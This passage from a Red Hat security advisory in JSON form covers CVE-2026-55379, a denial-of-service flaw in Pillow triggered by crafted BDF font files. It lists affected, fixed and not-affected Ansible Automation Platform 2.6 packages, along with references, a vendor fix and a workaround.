"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497452"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library\u0027s image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted BDF font file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Pillow Python imaging library. The BDF font file parser passes attacker-controlled dimensions to Image.new() without decompression bomb validation, allowing excessive memory allocation and denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "RHBZ#2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc"
}
],
"release_date": "2026-07-06T18:52:11.633000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Do not load BDF font files from untrusted sources. Applications that only process standard image formats (PNG, JPEG, etc.) and do not use BdfFontFile or ImageFont.load() with BDF files are not affected.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
